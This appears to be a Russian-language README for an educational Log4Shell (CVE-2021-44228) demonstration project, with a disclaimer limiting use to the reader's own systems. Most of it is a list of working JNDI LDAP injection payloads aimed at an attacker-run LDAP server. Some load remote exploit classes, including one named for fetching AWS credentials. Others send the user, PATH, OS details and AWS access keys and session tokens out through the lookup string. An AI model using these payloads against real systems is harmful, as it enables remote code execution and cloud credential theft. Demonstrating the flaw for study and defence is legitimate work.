
Образовательная демонстрация уязвимости Log4Shell (CVE-2021-44228) с JNDI LDAP-полезными нагрузками для экспериментального тестирования на ваших собственных системах.
Этот проект является демонстрацией работы уязвимости безопасности log4shell.
Данная уязвимость описана в CVE-2021-44228.
Проект предназначен исключительно для образовательных целей. Его следует использовать только на собственной системе и только в экспериментальных целях.
Любое выполнение осуществляется на ваш собственный риск. Автор снимает с себя всякую ответственность за инциденты, возникшие в результате выполнения проекта.
ldap_server=i-09cd4f41e5a2b1d66.eu-west-3.compute.internal:1389
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.Exploit}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.ExploitP,msg=my friend}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.aws.FetchCreds}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:USER}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:PATH}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=os=${java:os}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=aws_credentials,AWS_ACCESS_KEY_ID=${env:AWS_ACCESS_KEY_ID},AWS_SECRET_ACCESS_KEY=${env:AWS_SECRET_ACCESS_ID},AWS_SESSION_TOKEN=${env:AWS_SESSION_TOKEN}}'